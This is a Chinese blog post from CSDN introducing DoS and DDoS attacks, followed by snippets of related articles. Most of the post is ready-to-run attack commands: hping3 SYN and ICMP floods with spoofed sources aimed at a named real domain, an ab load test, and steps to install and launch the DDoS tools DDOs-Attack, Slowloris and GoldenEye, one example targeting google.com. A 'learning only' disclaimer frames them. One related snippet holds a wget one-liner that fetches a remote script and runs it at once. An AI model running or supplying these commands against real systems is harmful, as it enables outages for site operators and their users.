聊聊DOS/DDOS那些事

最新推荐文章于 2025-01-04 20:04:19 发布
最新推荐文章于 2025-01-04 20:04:19 发布
阅读量1k 收藏 21
点赞数 24
CC 4.0 BY-SA版权
分类专栏: 网络攻击 文章标签: 网络安全 测试工具 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/sc_1999/article/details/137103154
本文介绍了DOS和DDoS攻击的概念,包括其工作原理和常见的攻击方式,如TCP和ICMP协议攻击,以及web压力测试。重点介绍了KaliLinux中的两个DDoS工具:DDoS-Attack和Slowloris/Goldeneye,提醒读者网络安全学习的目的仅限于教育,切勿非法使用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言

大家作为一名网络安全爱好者,切记请勿恶意攻击他人

什么是DOS/DDOS

大家看到这个攻击名称是不是很熟悉,在近期的很多电影剧情中我们都会看到网络上很多人大量使用网络流量这种攻击来瘫痪和增加服务器的负担,使网站脱机无法使用

那我们细讲一下,所谓DOS就是指拒绝服务攻击。攻击者发送大量的恶意请求,从而增加服务器的负担。从而造成正常用户访问异常。而DDOS攻击(分布式拒绝服务),就是攻击者控制的大量的“肉鸡”,通过肉鸡在进行DOS攻击。而这种攻击也最难防御。

常见的攻击方式

讲一下一共有三个常见的方式

基于TCP协议的攻击

通过发送大量的TCP协议报文,从而使得服务器处于一个半链接状态(不能连上网)!

如图:进行了 1,2步骤 没有进行第3步。如,我们在kali中执行下面命令

hping3 -c 150000 --flood -S --rand-source bbskali.cn

这时,我们便可以看到,有很多IP同时在访问目录。

基于icmp协议的攻击

就是发送大量的ping包,让服务器瘫痪

hping3 --icmp  --flood -d 1400 --rand-source bbskali.cn

web压力测试

压力测试也称为cc攻击。通过模拟多用户多线程请求,来消耗CPU和内存。ab(Apache Bench)apache性能测试工具,这是 apache 免费自带的性能测试工具,能模拟多个并发请求(支持 HTTPS)。在kali中已默认自带,无需再次安装。

ab -t 60 -c 500 -n 500 https://bbskali.cn/thread-413-1-1.html

Kali Linux中两个常用的DDOS工具

DDOs-Attack

安装

git clone https://github.com/Ha3MrX/DDOs-Attack
cd DDOs-Attack
chmod +x ddos-attack.py
python ddos-attack.py

输入目标网址和端口便可完成 ddos

Slowloris

Slowloris 是 Github 上提供的免费开源工具。我们可以使用此工具执行拒绝服务攻击。这是一个用python编写的框架。此工具允许单台机器关闭另一台机器的 Web 服务器,它使用完全合法的 HTTP流量。它建立一个完整的 TCP 连接,然后在长期和定期的时间间隔只需要几百个请求。因此,该工具不需要花费大量流量来耗尽服务器上的可用连接。

Slowloris 的用途:

Slowloris 向目标发送多个请求,因此会产生大量流量的僵尸网络。Slowloris 可用于对任何网络服务器执行 ddos 攻击。它是一个开源工具,因此您可以从 github 免费下载它。它使用完全合法的 HTTP 流量。可以在 Slowloris 的帮助下通过产生大量僵尸网络流量来执行拒绝服务攻击。

安装

git clone https://github.com/gkbrk/slowloris.git
python3 slowloris .py(你的IP地址)-s 500

Goldeneye

Goldeneye是GitHub 上提供的免费开源工具。我们可以使用此工具执行拒绝服务攻击。它是一个用 .NET Core 编写的框架。该工具提供了许多用于日常工作的基类和扩展。此工具允许单台机器关闭另一台机器的 Web 服务器,它使用完全合法的 HTTP 流量。它建立一个完整的 TCP 连接,然后在长期和定期的时间间隔只需要几百个请求。因此,该工具不需要使用大量流量来耗尽服务器上的可用连接。

特征

  • Goldeneye 使用完全合法的 HTTP 流量。拒绝服务攻击可以在 Goldeneye 的帮助下通过产生大量僵尸网络流量来执行。

  • Goldeneye 向目标发送多个请求,结果会产生大量流量的僵尸网络。

  • Goldeneye 是一个开源工具,因此您可以从 GitHub 免费下载它。

  • Goldeneye 可用于对任何网络服务器执行 ddos攻击。

安装

git clone https://github.com/jseidl/GoldenEye.git
#示例 1使用 GoldenEye 工具对任意域进行 DDoS 攻击。
./goldeneye.py https://www.google.com -s 1000
#以“随机”模式发送流量
./goldeneye.py http://192.168.0.233:80/ -s 10 -m 6

结言

同时本文的主旨在于网络安全学习,再次强调请勿非法恶意攻击,造成后果自负,感兴趣的读者可以自行查阅深入了解。

Nginx与安全防护:DDoS攻击防御
java专栏
09-06 1033
大家好呀!今天咱们要探讨的是如何使用 Nginx 来加强网站的安全防护,尤其是如何应对 DDoS 攻击。DDoS 攻击是一种常见的网络攻击手段,它通过向目标服务器发送大量流量,试图让服务器不堪重负而崩溃。为了保护我们的网站不受这种攻击的影响,我们需要采取一些措施。接下来,就跟着我一起学习如何使用 Nginx 来实现这些安全防护吧!DDoS(Distributed Denial of Service)攻击,也就是分布式拒绝服务攻击。
什么是DDoS攻击?企业服务器是否需要DDoS防御
Srsshier的博客
11-25 626
下面我给简单的介绍一下DDoS原理,这是一个简化后的终端与服务器交换数据的模型,你的终端给服务器发送一个请求,服务器收到你这个请求后后,处理需要返回给你的信息,再把信息发送到你的终端,之后你的终端去解码、渲染这些信息就变成了各种绚丽多彩的网站。在DDoS黑色产业中,不仅有发动攻击的攻击者,也肯定会有请求攻击的雇佣者(金主),他们会出钱让黑客攻击一些对自己可能有竞争力的对手,让对方业务瘫痪,,少则几十几百个,多则上千上万个,当他们给服务器不断发送请求时,服务器就不那么容易处理的过来了,黑客就达成了他的目的。
DDOS】黄金眼一键脚本+客户端app
FromTodayTo的博客
12-09 7231
goldeneye(黄金眼)一键脚本: wget http://idc.ymhlw.cn/goldeneye.sh -O goldeneye.sh && chmod +x goldeneye.sh && ./goldeneye.sh 友明互联提供的一键脚本,使用方法 ./goldeneye.py http://xxxx 这里是网址 标志描述默认 -u,--useragents要使用的带有用户代理的文件(默认值:随机生成) -w,--workers并发工作者数(默认值:50)
推荐开源项目:GoldenEye - HTTP DoS 测试工具
gitblog_00014的博客
05-09 578
推荐开源项目:GoldenEye - HTTP DoS 测试工具 去发现同类优质开源项目:https://gitcode.com/ 项目介绍 GoldenEye 是一个仅供安全测试使用的Python 3应用程序。这个项目虽然不再维护,但其独特的功能和设计理念仍然使其在网络安全测试领域具有一定价值。它利用HTTP保持连接(Keep Alive)和禁止缓存(NoCache)的攻击向量,执行HTTP拒绝...
githubpythonddos_DDOS攻击压力测试-Goldendos
weixin_39558521的博客
12-22 671
每天都会收到阿里云推送的短信,说服务器被攻击了。突生想法,自己试试来对自己服务器做压力测试。到 GitHub 搜了一圈,发现了一个叫 GoldenEye 的项目。和大家分享一下,体验一把当 Hacker 的瘾。不过只会 DOS 攻击的是伪 Hacker ,粗鲁霸道,想要成为一名真正的 Hacker 还是要深入学习。GoldenEye is an python app for SECURITY T...
DoSDdoS攻防分析——其他拒绝服务攻击攻防总结
温柔小薛的博客
05-13 972
其他拒绝服务攻击攻防总结 哈哈哈虽然明儿考试但是!!!一天我不写博客真滴睡不香! 而且DoS留下一个小尾巴心里不舒服,今儿感觉复习差不多,就抽点时间把这个课听完了,这里的代码很多错,没有改完,之后做实验再回来改,留个小坑 Kali自带拒绝服务攻击工具 Hping3 几乎可以定制发送任何TCP/IP数据包,用于测试FW、端口扫描、性能测试 Syn Flood 攻击 -hping3 -c 1000 -d 120 -S -w 64 -p 80 - -flood - -rand-source 1.1.1.1
http(s)拒绝服务攻击工具--GoldenEye
weixin_43456810的博客
11-30 2528
http/https拒绝服务攻击工具–GoldenEye 获取方法: kali中直接wget: wget https://github.com/jseidl/GoldenEye/archive/master.zip 使用方法: ./goldeneye.py http://... -w 50 ./goldeneye.py http://... -w 50 -m random GoldenEye is a Python 3 app for SECURITY TESTING PURPOSES ONLY! Go
记一次被DDoS敲诈的历程
Coisini的博客
06-26 1162
0×01 背景 背景是这样,一个朋友网站业务被DDoS了,先是威胁要800元RMB,然后又转成提供DDOS的服务,然后又变成了DoS培训, 又变成了卖DDoS软件,最后又变成了DDoS高防护提供者,最后到警察叔叔那里,报警立案成功的故。 0×02 来自黑客的威胁 就在这几天,一个朋友传来了他被DDoS的消息,正在搬砖中看到他发的消息,说他们的客服收到到0118号客人的威胁信息,说要马上干掉你们。...
「面试」TCP/IP常见攻击
L的存在的博客
03-01 2112
这一篇主要和大家一起学习回顾关于 TCP/IP 的常见攻击,至少有一个基本的认识 前言 1 IP欺骗 IP是什么 在网络中,所有的设备都会分配一个地址。这个地址就仿佛小蓝的家地址「多少号多少室」,这个号就是分配给整个子网的,「室」对应的号码即分配给子网中计算机的,这就是网络中的地址。「号」对应的号码为网络号,「室」对应的号码为主机号,这个地址的整体就是IP地址。 通过IP地址我们能知道什么? 通过 IP 地址,我们就可以知道判断访问对象服务器的位置,通过这个 IP 地址就可以判断访问对象服务器.
服务器被攻击如何处理(DDOS攻击和服务器入侵)
XiaoYiLiangZai的博客
04-11 1873
安全的服务器都有概率被攻击,就算一个没有访问量的个人博客也有被攻击的情发生。今天小蚁君就跟大家讲讲当我们的服务器被攻击了到底该如何处理。 首先我们要分析到底是什么类型的攻击,是很常见的分布式拒绝服务攻击还是技术含量很高的渗透入侵等等。因为篇幅有限今天就只和大家说说分布式拒绝服务攻击和入侵的防御方法。 1. 分布式拒绝服务攻击 分布式拒绝服务攻击原理分布式拒绝服务攻击DDoS是一种基于DoS的特殊形式的拒绝服务攻击,是一种分布的、协同的大规模攻击方式。单一的DoS攻击一般是采用一对一方式的,它利用网
GoldenEye:GoldenEye HTTP DoS 测试工具-开源
05-30
GoldenEye 是一个仅用于安全测试目的的 Python 应用程序! GoldenEye 是一个 HTTP DoS 测试工具。 被利用的攻击向量:HTTP Keep Alive + NoCache 请参阅自述文件了解更多详情。 请注意,这是 https://github.com/jseidl Jan Seidl 在 GitHub 上的原始版本的一个分支。 官方项目链接是 https://github.com/jseidl/GoldenEye License 该软件根据 GNU 通用公共许可证第 3 版 (GPLv3) 分发。免责声明:使用风险自负。 本软件由版权所有者或贡献者“按原样”提供,并提供任何明示或暗示的保证,包括但不限于适销性和针对特定用途的适用性的暗示保证。 在任何情况下,版权持有人或贡献者均不对任何直接、间接、附带、特殊、惩戒性或后果性损害负责。
GoldenEye:GoldenEye第7层(KeepAlive + NoCache)DoS测试工具
05-26
不再需要维护此项目 黄金眼 GoldenEye是仅用于安全性测试目的的Python 3应用程序! GoldenEye是一个HTTP DoS测试工具。 被利用的攻击媒介:HTTP Keep Alive + NoCache 用法 USAGE: ./goldeneye.py <url> [OPTIONS] OPTIONS: Flag Description Default -u, --useragents File with user-agents to use (default: randomly generated) -w, --workers Number of concurrent workers (de
DeepLearning-IDS-master_入侵检测_ids_
10-03
基于深度学习的网络入侵检测方法,基于python,数据集为KDD
Python-GoldenEye一个HTTPDoS测试工具
08-10
GoldenEye一个HTTP DoS测试工具
拒绝服务攻击特征分析与检测
02-14
拒绝服务攻击特征分析与检测
【亲测免费】 Slowloris 开源项目使用教程
gitblog_00542的博客
08-10 351
Slowloris 开源项目使用教程 1. 项目的目录结构及介绍 Slowloris 项目的目录结构相对简单,主要包含以下几个部分: slowloris/ ├── LICENSE ├── README.md ├── requirements.txt └── slowloris.py LICENSE: 项目许可证文件,说明项目的使用许可。 README.md: 项目说明文档,包含项目的基本介绍、...
DOS攻击的原理和实现 (网络安全)hping3和Slowloris的运用
最新发布
2402_86725606的博客
01-04 1457
DoS攻击通过多种方式消耗目标系统的资源,导致服务无法访问。常见的攻击方式包括SYN洪水、UDP洪水、ICMP洪水、HTTP洪水等。随着网络攻击技术的不断发展,DDoS(分布式拒绝服务攻击)成为了更加复杂和难以防御的攻击类型。防御DoS攻击需要多层次的策略,包括流量监控、负载均衡、硬件防火墙、云服务抗DDoS等措施。
最新超详细VMware虚拟机安装完整教程_vmware虚拟机安装教程word
2401_84215240的博客
05-31 1882
VMWare虚拟机软件是一个“虚拟PC”软件,它使你可以在一台机器上同时运行二个或更多Windows、DOS、LINUX系统。与“多启动”系统相比,VMWare采用了完全不同的概念。多启动系统在一个时刻只能运行一个系统,在系统切换时需要重新启动机器。
安全牛学习笔记】拒绝服务攻击工具-NMAP、匿名者拒绝服务工具包(匿名者发布的DoS工具)、其他拒绝服务工具-XOIC、HULK、DDOSIM、GoldenEye
edu_aqniu的博客
10-17 7019
拒绝服务攻击工具                                                   Nmap                                                                    - grep dos /usr/share/nmap/scripts/script.db | cut -d "\"" -f 2
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值